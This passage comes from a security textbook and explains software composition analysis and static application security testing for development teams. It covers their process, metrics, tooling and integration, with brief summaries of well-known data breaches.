Prioritization and remediation: • Let’s say a few puzzle pieces are problematic. Which do you replace first? Which ones can wait? • SCA tools can highlight the severity of issues, letting you focus on replacing the most problematic pieces immediately while planning for the rest. Integration with development processes: • In the dynamic world of software development, CI/CD is the norm. It’s about integrating security checks at every stage of the CI/CD pipeline, ensuring a “shift-left” approach to security. • SCA tools integrate directly into these development pipelines, ensuring that every piece is vetted as it’s added. It’s like checking the quality and fit of every puzzle piece in real time as you work. Informed decision-making: • Before choosing a component, developers can consult the SCA tool to see if it has known issues or if there are safer alternatives • It’s like having a puzzle aficionado beside you, advising on which sets tend to have the best pieces for your project

The benefits of SCA SCA tools offer multiple advantages, including bolstering the security of third-party code, ensuring legal compliance with licensing, providing timely updates for vulnerabilities, and streamlining the process of identifying potential threats, all of which grant developers peace of mind. However, they’re not without drawbacks. These tools can sometimes raise unnecessary alerts and may be complex and intimidating for new users. It’s not that SCA tools “don’t always” cover custom-written code; they primarily focus on third-party components. For custom-written code, other tools such as static application security testing (SAST) are more appropriate. It can be a financial strain for some and might face compatibility issues with certain development processes or tools. Advantages: • Safety first: Imagine that your software is a house. SCA tools are like security checks that make sure you’re not unknowingly using bricks that crumble easily. They ensure the third-party code you’re using is going to stay intact and keep bad guys in. • No surprises on the legal front: Using someone else’s code? That comes with rules. Think of these tools as legal advisors who make sure you’re not accidentally breaking any of those rules. This way, you’re not slapped with unexpected legal issues. • Keeping up with the times: Software vulnerabilities are like fashion; what’s secure today might not be tomorrow. SCA tools give you a nudge when your code is outdated, helping you update and stay trendy (or in this case, secure).

101

102

Software Composition Analysis (SCA)

• Save time and energy: Instead of manually digging through every line of third-party code to see if it’s safe, these tools do the heavy lifting. It’s like having a metal detector while looking for needles in a haystack. • Peace of mind: Sleep better knowing you’ve got a watchdog. These tools continuously scan and alert you if something goes wrong, so you’re only sometimes on edge. Disadvantages: • False alarms: It’s not about “cry wolf.” False positives can lead to alert fatigue, where genuine threats might be overlooked due to the volume of alerts. • Complexity can be overwhelming: Some of these tools come with lots of bells and whistles. For a newbie or occasional user, it can feel like trying to fly a spaceship when all you wanted was a bicycle. • It’s not a magic bullet: Just because you have an SCA tool doesn’t mean you’re 100% safe. They mostly focus on open source components, so any custom code you’ve written still needs its own set of eyes and checks. Relying solely on them is like having a guard dog but leaving the front door unlocked. • Cost: Quality often comes at a price. Some of these tools can be expensive, especially for small teams or individual developers. It’s an investment, and like all investments, it needs careful consideration. • Integration hiccups: Integration challenges are not just about “fitting;” they can also arise due to compatibility issues, version mismatches, or lack of support for specific platforms or languages.

SAST versus SCA SAST and SCA are both important techniques that are used to identify security vulnerabilities in software applications, but they differ in their approach and focus. SAST uses a set of predefined rules and algorithms to scan the code and identify issues such as buffer overflows, SQL injection, cross-site scripting (XSS), and other common vulnerabilities. SAST can help identify security issues early in the development process when fixing them is easier and cheaper. SAST tools can also be integrated into the development process to automate code scanning and improve the efficiency of security testing. On the other hand, SCA focuses on identifying potential vulnerabilities in third-party software components used in an application’s development. SCA analyzes the dependencies in the application code and identifies any known security vulnerabilities in the open source components used. SCA can help identify vulnerabilities in third-party components that may not be apparent from looking at the application’s source code.

The benefits of SCA

Here are some points that make a difference: • Scope: SAST analyzes the application source code to identify vulnerabilities in the application code itself. It looks for issues such as buffer overflows, SQL injection, XSS, and other common vulnerabilities. In contrast, SCA analyzes the third-party components used in the development of the application to identify known security vulnerabilities in those components. • Approach: While this is accurate, it’s also essential to note that SAST tools can be rule-based or heuristic-based, and they analyze the code’s flow to identify potential vulnerabilities. It does not require the application to be running or any external dependencies to be present. SCA, on the other hand, relies on a database of known vulnerabilities to analyze the third-party components that are used in the application. It may also require access to external package repositories to download information about the components used. • Integration: SAST can be integrated into the development process to automate code scanning and improve the efficiency of security testing. SCA can also be integrated into the development process, but it typically requires more effort to set up and maintain. • Timing: SAST can be performed early in the development process, before the application is deployed, to identify and fix vulnerabilities before they can be exploited. • Results: SAST provides a detailed report of potential vulnerabilities in the application source code, including the location of the vulnerability and recommendations for remediation. SCA provides a report of known vulnerabilities in the third-party components used in the application, including information about the severity of the vulnerability and recommendations for remediation.

The SCA process SCA is a process similar to vetting the ingredients of a dish at a fancy restaurant. You want to make sure everything that goes into that dish is fresh, safe to consume, and doesn’t conflict with dietary restrictions. Let’s understand this analogy in simple terms. Gathering the ingredients (Discovery): • Before you can check anything, you need to know what’s in the dish. In software, this means understanding which external components or “ingredients” (such as open source libraries or third-party plugins) are in your application. • The SCA tool scans the software to identify all these components, both the ones you directly added and those brought in indirectly because they’re dependencies of the primary components. Checking the ingredients’ freshness (Vulnerability detection): • With a list of ingredients in hand, the SCA tool then checks each one against a database of known vulnerabilities, just as a chef might inspect each vegetable or piece of meat for signs of rot or contamination.

103

104

Software Composition Analysis (SCA)

• If the tool finds a match between a component in your software and a known vulnerability, it’ll raise a flag. It’s like finding out that the tomatoes you’re using were part of a batch that was recalled for salmonella! Dietary restrictions (License compliance): • Just as certain foods have dietary restrictions, software components come with licensing terms that need to be adhered to. Some licenses say, “Hey, use me for free, but if you make any changes, you have to share those changes with everyone.” Others might have stricter or looser terms. • The SCA tool checks the licenses of all components against your company’s policies to ensure there’s no legal conflict. If there’s a mismatch, it’s like finding out a dish has peanuts when it shouldn’t – a big no-no! Recipe recommendations (Remediation guidance): • If there’s a problem with one of the ingredients, the tool doesn’t just stop at identifying it – it also suggests alternatives or solutions. For instance, if a particular version of a component has a vulnerability, the tool might recommend upgrading to a newer, safer version. • It’s like a chef finding out a particular ingredient is bad and then checking a cookbook for an alternative ingredient or preparation method. Keeping an eye out (Continuous monitoring): • New vulnerabilities and issues are discovered every day. So, the SCA tool constantly monitors for updates about the components you’re using. • Think of it as a chef who’s always listening to food safety alerts to ensure none of the ingredients in their pantry has been recalled or flagged as unsafe since their last check. Clear communication (Reporting): • Once the tool has finished analyzing, it presents its findings in a comprehensive report. This report details what’s been found, how severe it is, and what can be done about it. • Imagine a chef presenting a detailed breakdown of a dish, its ingredients, its sources, and any potential dietary concerns to a diner. SCA is like a thorough quality and safety check for the components of a software application. By ensuring everything is up to par, you’re not just making your software safer and more legally compliant – you’re also ensuring a better user experience, just as a diner would enjoy a well-prepared, safe, and delicious meal!

The benefits of SCA

SCA metrics SCA metrics are like the vital signs and health indicators for your software’s third-party ingredients. Just as a doctor would measure blood pressure, cholesterol, or glucose levels to assess your health, SCA metrics give you an idea about the health and risks associated with your software’s components. Let’s delve into some of these key metrics: • Total dependencies (direct and transitive): ‚ Think of this as the total number of ingredients in your recipe. Some you add directly (such as salt or flour) and others come along because they’re part of something else (like how buying a cake mix might bring along baking powder and flavorings). ‚ It tells you how many external components your software relies on, both those you’ve chosen and those that hitch a ride with your primary choices. • Vulnerable dependencies: ‚ This is the count of your ingredients that have known problems. Maybe a certain spice is recalled because it contains contaminants. In software, this refers to components with known security issues. ‚ Keeping this number low is crucial for the safety of your software dish! • License compliance violations: ‚ Imagine you’re using a secret sauce from a chef who says, “You can use it, but only in certain dishes.” This metric tells you how many of your ingredients (software components) might be breaking such rules. ‚ It’s essential for avoiding potential legal headaches. • Outdated dependencies: ‚ Just as fresh ingredients make the best dishes, using the latest versions of software components is usually a good idea. This metric tells you how many of your components are outdated and could be updated for better performance or safety. • Severity breakdown of vulnerabilities: ‚ Not all bad ingredients are equally harmful. Maybe one ingredient is slightly stale, while another is outright moldy. Similarly, this metric breaks down vulnerabilities by their severity – critical, high, medium, or low. ‚ It helps prioritize which issues to tackle first.

105

106

Software Composition Analysis (SCA)

• Mean time to remediation (MTTR): ‚ Once a problem ingredient is identified, how long does it take to fix or replace it? MTTR measures the average time it takes to address a vulnerability after it’s detected. ‚ A lower MTTR is like a chef quickly swapping out a rotten vegetable for a fresh one. • Policy violations: ‚ Sometimes, certain ingredients are off-limits because of dietary preferences or health reasons. In the software world, these are company-specific rules on which components or licenses to avoid. This metric highlights where you might be going against these guidelines. • Repeated vulnerabilities: ‚ Are you making the same mistakes repeatedly? Just as a chef might continually forget to deseed a chili, this metric tracks if certain vulnerabilities keep cropping up in your software. ‚ Recognizing patterns helps in taking corrective measures for the long term. SCA metrics act as the health report card for your software’s third-party components. They offer a comprehensive picture, highlighting areas of strength and pointing out where immediate attention is needed, ensuring that your software dish remains delicious, safe, and without any unwanted surprises!

Integrating SCA with other security tools Integrating SCA with other security tools ensures that every aspect of your software, from the custom code you write to the third-party components you use, is checked and re-checked for potential issues. It’s like building a house where the architect, electrician, plumber, and safety inspector all collaborate, ensuring the result is a sturdy, safe, and lasting structure. Let’s imagine your software development process as constructing a building. Just as you’d need various specialists such as architects, electricians, plumbers, and safety inspectors working together to build a safe and functional structure, in the software realm, you need various tools to ensure robust and secure applications. One of those specialists uses SCA. Let’s see how this SCA “specialist” collaborates with other “specialists” in the software construction process: 1. SCA and SAST: ‚ Analogy: SAST is like checking the structural design of the building. It ensures that the blueprint itself has no inherent flaws. ‚ Integration: By combining SCA (which checks the quality of building materials or thirdparty components) with SAST (which checks the architectural soundness of the custom code), you get a comprehensive view. Both ensure that your software is well designed and made of reliable components.

The benefits of SCA

2. SCA and dynamic application security testing (DAST): ‚ Analogy: DAST is like evaluating the building when it’s functioning – checking electrical systems under load or plumbing under pressure. ‚ Integration: While DAST tests the running application for vulnerabilities, SCA ensures the third-party components are not introducing weaknesses. When integrated, you’re making sure your building works as intended and that its materials won’t fail you. 3. SCA and interactive application security testing (IAST): ‚ Analogy: IAST is like having sensors throughout the building, providing real-time feedback during various scenarios ‚ Integration: As IAST monitors the application from within, combining it with SCA ensures that both internal operations and third-party components are being monitored simultaneously, offering a real-time, holistic view of the application’s security 4. SCA and container security: ‚ Analogy: If your software is a household item, then container security ensures the safety of the box it comes in. Containers bundle up software with all its dependencies, ensuring consistency across various environments. ‚ Integration: By integrating SCA with container security tools, you can ensure that not only is the software’s “box” safe, but the third-party components inside are also free of vulnerabilities. 5. SCA and software development and integration tools (for example, CI/CD tools): ‚ Analogy: CI/CD tools are like conveyor belts and automated machinery in a factory, ensuring smooth, consistent, and rapid production. ‚ Integration: Introducing SCA into these tools ensures that every piece of software, every update or feature, goes through a checkpoint to ensure third-party components are safe. It’s like having a quality checker at every stage of the production line. 6. SCA and threat intelligence platforms: ‚ Analogy: These platforms are like your security information hub, gathering data about potential threats from various sources. ‚ Integration: When SCA tools are integrated with threat intelligence, they can provide richer insights. It’s like cross-referencing the quality of your building materials with recent market recalls or warnings.

107

108

Software Composition Analysis (SCA)

Resolving the issues without breaking the build Before we dive into the heart of the matter, let’s clarify what “the build” means. In software development, “building” refers to the process of converting source code into executable applications. The term “breaking the build” means introducing changes (often unintentionally) that stop the software from compiling or running correctly. The adage “prevention is better than a cure” rings true. Ensuring that issues are resolved without breaking the build maintains the momentum of development, safeguards team morale, and upholds user trust. With practices such as CI, unit testing, and code reviews, developers can gracefully handle issues without letting them disrupt the larger machinery of software delivery. Let’s look at why resolving issues without breaking the build is important: • Continuity of development: A broken build can halt the development process. If developers have to stop their work to fix a broken build, it delays the project and derails their focus. • Efficiency: Time spent fixing a broken build is time not spent adding features or addressing other tasks. It’s a costly distraction. • Team morale: Constantly dealing with broken builds can be frustrating and demoralizing for a development team. It can lead to finger-pointing and a decrease in team cohesion. • Customer trust: For software that’s already in production, breaking the build can mean downtime or bugs for users, which erodes trust. We can do the following to resolve issues without breaking the build: • Unit testing: Before integrating changes into the main code base, run unit tests to ensure that the new code works as expected and doesn’t introduce new bugs. • CI: Use CI tools to automatically compile and test your application every time changes are made. This provides immediate feedback if something’s broken, allowing for quick fixes. • Feature flags: Implement feature flags to toggle new changes. If a new feature causes issues, you can turn it off without affecting the rest of the application. • Rollback strategy: Always have a plan to quickly revert changes. If a new deployment breaks the build, rolling back to the previous stable version ensures continuity. • Code reviews: Before integrating new code, have another team member review it. A fresh pair of eyes can catch potential issues. • Environment parity: Ensure that your development, testing, and production environments are as similar as possible. This reduces the “it works on my machine” problem. • Incremental changes: Instead of making massive changes at once, make smaller, incremental changes. This way, if something goes wrong, it’s easier to pinpoint and rectify.

Detection of security flaws

• Documentation: Keep thorough documentation. If a problem arises, developers can understand the context and purpose of the code, making it easier to fix without unintended side effects.

Detection of security flaws SCA tools are primarily focused on detecting vulnerabilities in open source and third-party components. However, it’s important to understand that while SCA tools are a crucial part of the software security landscape, they specifically cater to the threats posed by the reuse of external components. Here’s a deeper dive into how SCA tools detect security flaws: • Open source databases and repositories: SCA tools continuously monitor and pull data from popular vulnerability databases such as the NVD, as well as other sources such as security advisories, mailing lists, or even GitHub repositories. • Dependency analysis: SCA tools analyze the list of dependencies used in an application. This includes both direct dependencies (the ones you include explicitly) and transitive dependencies (dependencies of your dependencies). • Version checking: Once the tool knows which components and versions are being used, it checks them against its database of known vulnerabilities. If a used component version has a known vulnerability, it will be flagged. • License analysis: While not a “security flaw” in the traditional sense, license violations can pose a legal risk to organizations. SCA tools identify the licenses of incorporated components and alert users to potential license conflicts or non-compliance. • Continuous monitoring: As new vulnerabilities are discovered every day, SCA tools continuously monitor for updates to vulnerabilities that might affect components in your applications. This ensures that the user is alerted in real time or as soon as a new vulnerability is made public. • Policy enforcement: Many SCA tools allow organizations to set up specific security policies. If a component violates these policies (for example, it has a high-severity vulnerability or uses a forbidden license), the tool will flag it. • Remediation recommendations: Beyond detection, many SCA tools also provide recommendations or even automated solutions to address the identified vulnerabilities, guiding developers on updating to a safer version or replacing the vulnerable component. However, it’s essential to note that while SCA tools are excellent for identifying known vulnerabilities in third-party components, they do not typically identify vulnerabilities in custom-written code or more sophisticated security flaws. For those, other security tools such as SAST or DAST tools would be more appropriate.

109

110

Software Composition Analysis (SCA)

Open source SCA tools SCA tools are used to identify and manage open source and third-party components in software applications. These tools help ensure the components are free from vulnerabilities, comply with licenses, and meet security and quality standards. Here is an overview of some popular SCA tools and their functionalities: • WhiteSource: ‚ Functionality: Detects open source components, reports on vulnerabilities, provides remediation insights, and ensures license compliance ‚ Features: Real-time alerts, integration with dev tools, license risk analysis, and dependency check • Snyk: ‚ Functionality: Focuses primarily on finding and fixing vulnerabilities in open source dependencies ‚ Features: Continuous monitoring, automatic pull requests for fixes, integration with popular development platforms, and a vulnerability database • FOSSA: ‚ Functionality: Offers automated license compliance and vulnerability management ‚ Features: Deep dependency analysis, policy enforcement, CI/CD integration, and license compliance checks • Dependency-Check: ‚ Functionality: An open source SCA tool that identifies project dependencies and checks whether there are any known, publicly disclosed vulnerabilities ‚ Features: Command-line interface, integration with build tools such as Maven and Gradle, and a local database of vulnerabilities • Nexus Lifecycle by Sonatype: ‚ Functionality: Automatically identifies open source risks in applications from the developer’s IDE, through CI/CD, to production ‚ Features: Real-time monitoring, policy enforcement, integration with Nexus Repository, and remediation guidance

Discussing past breaches

• Veracode Software Composition Analysis: ‚ Functionality: Identifies risks from open source components to ensure they are secure and compliant ‚ Features: Visual graphs of component layers, integration with CI/CD pipelines, and policy enforcement • Mend.io: ‚ Functionality: Mend.io provides automated remediation for open source and custom code to improve application security and save crucial time for developers ‚ Features: Mend.io is designed to streamline the bug-fixing process in software development. It uses cutting-edge algorithms and machine learning to automatically identify and fix code issues. These tools, and others in the market, often provide a combination of features, including continuous monitoring, policy enforcement, CI/CD integration, and alerting mechanisms. When selecting an SCA tool, consider factors such as the depth of the tool’s vulnerability database, ease of integration with your development tools, and the level of support provided by the vendor.

Discussing past breaches Let’s delve into a few of the most impactful security breaches from the past, detailing their causes and ramifications. I’ll mention the specifics in a human-friendly manner. Although I can’t provide direct clickable links (due to platform limitations), I’ll mention sources you can search for further reading: 1. Equifax (2017): ‚ Details: Equifax, a giant in the credit reporting industry, disclosed that the personal data of 147 million people, including Social Security numbers, addresses, and in some cases, credit card information, had been exposed. ‚ Cause: The breach was attributed to a web application vulnerability related to Apache Struts, a popular open source framework. Equifax failed to patch this vulnerability in time. ‚ Impact: The breach had significant consequences, affecting almost half of the U.S. population. It led to regulatory fines and a class-action lawsuit. ‚ Further reading: Look for the Equifax breach on the US Federal Trade Commission’s official website. 2. Yahoo! (2013-2014): ‚ Details: Yahoo! had two major data breaches. The one in 2013 affected 1 billion user accounts, while the other in 2014 affected 500 million. In 2017, they disclosed that all 3 billion of its user accounts had been affected in total.

111

112

Software Composition Analysis (SCA)

‚ Cause: While Yahoo! Suggested that the breach was the work of state-sponsored hackers, the specifics of the exploit were not fully detailed. ‚ Impact: Personal data, including names, email addresses, hashed passwords, and security questions, were exposed. The breaches significantly impacted Yahoo!’s reputation and its sale price in its acquisition by Verizon. ‚ Further reading: Articles from Reuters and The New York Times covered this breach extensively. 3. Target (2013): ‚ Details: Cybercriminals stole 40 million credit and debit card records and an additional 70 million customer records. ‚ Cause: The attackers initially gained access via an HVAC vendor with network access for billing purposes. They then placed malware on Target’s point-of-sale (PoS) systems. ‚ Impact: Beyond the immediate data theft, Target faced over 90 lawsuits, a damaged reputation, and significant expenses for mitigation. ‚ Further reading: Search for Target’s breach reports on KrebsOnSecurity, a leading cybersecurity blog. 4. Sony Pictures (2014): ‚ Details: A high-profile attack where unreleased films, scripts, private emails, employee data, and more were leaked. ‚ Cause: While the specifics of the intrusion method were not publicly detailed, North Korea was blamed, possibly due to Sony’s film The Interview, which mocked the North Korean leader. ‚ Impact: The leak of emails and documents was particularly embarrassing and damaging for Sony. The breach changed how Hollywood approached cybersecurity. ‚ Further reading: The Guardian and Wired have detailed articles on this topic. 5. Capital One (2019): ‚ Details: Data from over 100 million customers was exposed, including names, addresses, and credit scores. ‚ Cause: The breach was unique as it was attributed to a former employee of AWS, Capital One’s cloud provider. She exploited a misconfigured web application firewall. ‚ Impact: Capital One faced significant reputational damage, regulatory scrutiny, and potential lawsuits. ‚ Further reading: The Wall Street Journal and CNN covered this breach in depth.

Summary

6. Marriott (2018): ‚ Details: Personal data from approximately 500 million guests was exposed. ‚ Cause: The breach began on the Starwood guest reservation database in 2014, before Marriott’s acquisition. Unauthorized access persisted for four years. ‚ Impact: This breach was significant not just in scale, but it emphasized the importance of cybersecurity assessments during mergers and acquisitions. ‚ Further reading: BBC and Reuters provided extensive coverage of this incident.

Summary SCA is akin to a detective that examines all the parts and pieces (components) that make up a software product. The detective looks at third-party or open source components to ensure there are no known vulnerabilities, licensing issues, or outdated elements. Imagine building a house with some pre-made materials, such as bricks, doors, or windows. If you didn’t know where they came from or their quality, the house might have weak points. Similarly, modern software relies heavily on third-party components. SCA helps companies understand what’s in their software “house,” ensuring it’s safe, secure, and legally compliant. The following are the benefits of SCA: • Security: By identifying and resolving known vulnerabilities in third-party components, software is less prone to hacks • Compliance: With SCA, you can track licenses, ensuring you’re not violating any terms • Maintenance: It’s easier to update or patch components when you know what you’re using • Confidence: Developers and businesses can be more assured that their software product is robust and safe Security flaws in software are like cracks in a dam. They might seem small, but they can lead to massive failures. SCA tools scan components against databases of known vulnerabilities, giving developers insights into potential risks. By identifying these “cracks,” they can be sealed before causing harm. Breaches such as the ones at Equifax, Yahoo!, and Target highlight the importance of proactive security measures, including timely patching, secure configurations, and continuous monitoring. Often, these breaches were due to unpatched vulnerabilities or oversights. They remind us that even giants aren’t immune and that thorough, proactive security practices are crucial.

113

114

Software Composition Analysis (SCA)

The open source community offers several tools for SCA. Here are some notable examples: • OWASP Dependency-Check: This tool checks project dependencies for publicly disclosed vulnerabilities • OWASP Dependency-Track: This tool scans a big software bill of materials SCA is like a health checkup for software, examining its third-party components for vulnerabilities, compliance issues, and other risks. Its importance can’t be understated in today’s digital world as software often relies on numerous external components. With the help of SCA, we can ensure our software is secure, compliant, and maintainable. This is highlighted by past major breaches, where minor overlooked vulnerabilities led to significant damages. For those looking to adopt SCA without heavy investments, the open source community offers a range of tools to get started. In essence, SCA is a pivotal practice in modern software development, acting as a guardian against potential threats and pitfalls. In the next chapter, we will cover SAST and the different types of techniques and tools that are used to perform SAST.

9 Static Application Security Testing (SAST) Software security is an essential aspect of software development, and Static Application Security Testing (SAST) is an essential tool in ensuring software security. SAST is a type of security testing that involves analyzing source code or compiled binaries to identify security vulnerabilities. SAST tools can help developers find security flaws early in the development life cycle, reducing the risk of security incidents and ensuring compliance with security standards. This chapter will provide an overview of SAST security, as well as its benefits and limitations, and discuss how it fits into the overall software development process. SAST occurs early in the Software Development Life Cycle (SDLC) as it analyzes code in a non-running state and does not require a working application. This chapter covers the free and open source tools around SAST: • What is SAST? • Identifying vulnerabilities early in the development process • Resolving issues without breaking the build • Benefits of SAST • Open source SAST tools

Introduction Software security testing is a crucial component of the software development process as it ensures that software applications are secure and resilient against attacks. It involves testing software for vulnerabilities and weaknesses that attackers can exploit to gain unauthorized access, steal data, or cause harm to the system. Various types of security testing exist, including SAST, Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), and penetration testing.

116

Static Application Security Testing (SAST)

Security testing is not a one-time activity but rather a continuous process that needs to be integrated into the SDLC. It involves identifying security requirements, assessing potential risks, developing security controls, implementing security measures, and monitoring the system for any security incidents. Software security is a critical aspect of modern software development, and it requires continuous attention and effort to ensure that software applications are secure and resilient against security risks.

What is SAST? SAST is a type of security testing that analyzes source code or compiled binaries to identify potential security vulnerabilities. SAST is performed during software development and helps developers find security flaws early in the SDLC. SAST is beneficial in identifying security flaws early in the development process, facilitating easier and more cost-effective remediation. Additionally, SAST helps ensure compliance with security standards and regulations, such as the OWASP Top Ten, PCI DSS, and HIPAA. However, SAST has its limitations. Many SAST tools produce false positives and false negatives, which can be time-consuming to investigate and fix. False positives occur when the tool identifies a vulnerability that is not present, while false negatives occur when the tool fails to detect an actual vulnerability. SAST tools can also have difficulty detecting certain types of vulnerabilities, such as those related to runtime behavior. A false negative is a term that’s commonly used in various testing contexts, particularly in medical testing and computer security, to describe a situation where a test fails to detect something present. SAST is an essential tool in ensuring software security, and its benefits outweigh its limitations. SAST should be integrated into the software development process, along with other security testing techniques, to ensure that software applications are secure and resilient against security risks.

SAST tools and their functionalities SAST tools are automated software tools that are used to analyze source code or compiled binaries to identify potential security vulnerabilities. SAST tools use a set of predefined rules and algorithms to scan the code and identify vulnerabilities that can be exploited by attackers. SAST tools statically analyze the code, without execution, to identify patterns and recognize vulnerabilities. These tools can detect issues such as buffer overflows, SQL injection, Cross-Site Scripting (XSS), and other common vulnerabilities. Some common functionalities of SAST tools are as follows: • Code analysis: SAST tools analyze the source code and identify potential vulnerabilities. They check for coding errors, insecure coding practices, and other issues that can lead to security vulnerabilities.

Identifying vulnerabilities early in the development process

• Rule-based scanning: SAST tools use predefined rules to scan the code and identify potential security vulnerabilities. These rules are based on best practices and known vulnerabilities, and they can be customized to suit the specific needs of the organization. • False positive reduction: SAST tools use techniques such as data flow analysis, taint analysis, and control flow analysis to reduce false positives. False positives occur when the tool identifies a vulnerability that is not present in the code. • Integration with development tools: SAST tools can be integrated with development tools such as IDEs and build systems to scan code during the development process. This allows developers to identify and fix vulnerabilities early in the SDLC. • Reporting: SAST tools provide detailed reports that list the identified vulnerabilities and provide guidance on how to fix them. The reports may include code snippets or suggested changes to the code to fix the vulnerabilities. • Compliance checking: SAST tools can check code for compliance with security standards and regulations, such as the OWASP Top Ten, PCI DSS, and HIPAA. In summary, SAST tools are automated software tools that analyze source code or compiled binaries to identify potential security vulnerabilities. SAST tools provide several functionalities that help ensure that software applications are secure and resilient against security risks.

Identifying vulnerabilities early in the development process Identifying vulnerabilities early in the development process is one of the key benefits of SAST, along with Software Component Analysis (SCA) and threat modeling. SAST tools analyze application source code before it is compiled and deployed, allowing vulnerabilities to be identified early in the development cycle. By doing this, organizations can remediate them before they are deployed into production. This reduces the risk of security incidents and minimizes the cost of remediation. Identifying such vulnerabilities early is a key benefit of SAST as it allows organizations to remediate vulnerabilities before they are deployed into production, reduce the risk of security incidents, and comply with regulatory requirements.

The SAST process The SAST process is a set of activities and workflows that are used to perform SAST. Here is an overview of the typical SAST process and workflow: 1. Tool selection: The first step is to select a suitable SAST tool that meets the requirements of the application being tested. This includes considering factors such as the programming language used, the complexity of the application, and the type of vulnerabilities to be identified.

117

118

Static Application Security Testing (SAST)

2. Configuration: The SAST tool needs to be configured to analyze the application source code. This includes defining the scope of the analysis, such as which files and directories should be analyzed, and specifying any custom rules or settings. 3. Code scanning: The SAST tool scans the application source code to identify potential security vulnerabilities. This process is performed automatically and typically takes several hours to complete, depending on the size and complexity of the application. 4. Vulnerability identification: The SAST tool identifies potential vulnerabilities in the application source code based on the predefined rules and algorithms. The tool generates a report that lists the vulnerabilities, along with information about the location of the vulnerability in the code, the severity of the issue, and recommendations for remediation. 5. Review and analysis: The report is reviewed and analyzed by security experts to confirm the validity of the identified vulnerabilities and prioritize them based on severity and potential impact. This step may also include further investigation of the identified vulnerabilities, such as testing to determine if they can be exploited or if there are any mitigating factors. 6. Remediation: The identified vulnerabilities are remediated by the development team. This may involve modifying the code to eliminate the vulnerabilities, adding additional security controls or checks, or replacing vulnerable third-party components. 7. Verification: The remediated code is tested to ensure that the identified vulnerabilities have been properly addressed and that no new vulnerabilities have been introduced. This may include both manual testing and automated testing using the SAST tool or other testing tools. 8. Reporting: A final report is generated that summarizes the findings of the SAST testing process, including the vulnerabilities identified, their severity, and the remediation steps taken.

SAST metrics SAST metrics and reporting refer to the process of measuring the effectiveness and efficiency of SAST and communicating the results to stakeholders. Here are some of the common metrics and reporting practices in SAST: • Code coverage: Code coverage is a measure of the percentage of the application’s code that was analyzed by the SAST tool. Code coverage can help to identify areas of the application that were not analyzed and may be vulnerable to security risks. • Vulnerability density: Vulnerability density is a measure of the number of vulnerabilities per line of code. This metric can help to identify areas of the code that may require additional testing and remediation. • False positive rate: The false positive rate is a measure of the number of vulnerabilities identified by the SAST tool that are not vulnerabilities. A high false positive rate can lead to wasted time and resources on unnecessary remediation.

Identifying vulnerabilities early in the development process

• Remediation time: Remediation time is a measure of the time it takes to fix identified vulnerabilities. This metric can help to identify areas of the code that may require additional attention and resources. • Risk tanking: Risk ranking is a measure of the severity and potential impact of identified vulnerabilities. This metric can help to prioritize remediation efforts and allocate resources more effectively. Reporting practices in SAST typically involve generating a report that summarizes the findings of the SAST analysis, including the identified vulnerabilities, their severity, and recommendations for remediation. The report should be clear and concise and should be tailored to the needs of the intended audience, such as developers, security analysts, or management. It is important to communicate the results of the SAST analysis in a way that is easy to understand and actionable, to ensure that identified vulnerabilities are properly remediated and that the overall security posture of the application is improved.

Integrating SAST with other security tools Integrating SAST with other security tools is important for achieving a comprehensive and effective security testing program. Here are some examples of how SAST can be integrated with other security tools: • Integrated Development Environment (IDE) integration: SAST tools can be integrated with IDEs to provide real-time feedback to developers as they write code. This helps identify potential vulnerabilities as soon as they are introduced, allowing for immediate remediation. • Continuous Integration/Continuous Deployment (CI/CD) integration: SAST tools can be integrated with CI/CD pipelines to automatically analyze code changes as they are committed to the code repository. This helps to identify vulnerabilities early in the development process and enables faster remediation. • Web Application Firewall (WAF) integration: SAST tools can be integrated with WAFs to provide additional protection against known vulnerabilities. • DAST integration: SAST tools can be integrated with DAST tools to provide a more comprehensive security testing program. SAST tools analyze the code to identify potential vulnerabilities, while DAST tools test the application in a running environment to identify vulnerabilities that may not be apparent in the code. • Threat intelligence integration: SAST tools can be integrated with threat intelligence feeds to provide additional context and prioritize remediation efforts. Threat intelligence feeds can provide information on known threats and vulnerabilities, which can be used to guide the SAST analysis and prioritize remediation efforts. By integrating SAST with other security tools, organizations can create a more comprehensive and effective security testing program that helps to identify and remediate vulnerabilities earlier in the development process, reducing the risk of security incidents and improving the overall security posture of the application.

119

120

Static Application Security Testing (SAST)

Resolving issues without breaking the build Resolving issues without breaking the build is an important aspect of integrating SAST into the development process. We need to make sure that when we help developers identify any critical issue in the build with the DevSecOps process, the build is not failing and we can still fix the issues within the stipulated timeline. To accomplish this, developers need to understand the nature of the vulnerability and its impact on the application. They also need to have access to tools and resources that can help them resolve the issue, such as code snippets or guidance on best practices. One approach to resolving issues without breaking the build is to use an iterative development process. In this approach, developers identify and remediate vulnerabilities in small batches, testing each change to ensure that it does not introduce new vulnerabilities or break the build. Another approach is to use code branching and version control to isolate changes to the vulnerable code, allowing developers to make changes and test them without impacting the rest of the application. Once these changes have been tested and verified, they can be merged back into the main code base. In addition, developers can use automated testing tools, such as unit testing and integration testing, to verify that the changes they make do not break the build or impact other functionality. This can help ensure that vulnerabilities are remediated quickly and efficiently, without introducing new issues or delaying the development process. When integrating SAST into the development process, it is essential to ensure that vulnerabilities are remediated without breaking the build or impacting other functionality. There are several approaches that developers can take to achieve this goal: • Iterative development: With an iterative development approach, developers identify and remediate vulnerabilities in small batches, testing each change to ensure that it does not introduce new vulnerabilities or break the build. This approach allows developers to focus on a specific set of vulnerabilities and ensure that each one is remediated effectively before moving on to the next set. • Code branching and version control: Code branching and version control allow developers to isolate changes to the vulnerable code, making it easier to test and verify changes without impacting the rest of the application. This approach can be especially useful when multiple developers are working on the same code base or when changes need to be made quickly and efficiently. • Automated testing: Automated testing tools, such as unit testing and integration testing, can help verify that changes that have been made to remediate vulnerabilities do not break the build or impact other functionality. By using these tools, developers can quickly and efficiently verify that their changes are effective without introducing new issues or delaying the development process.

The benefits of SAST

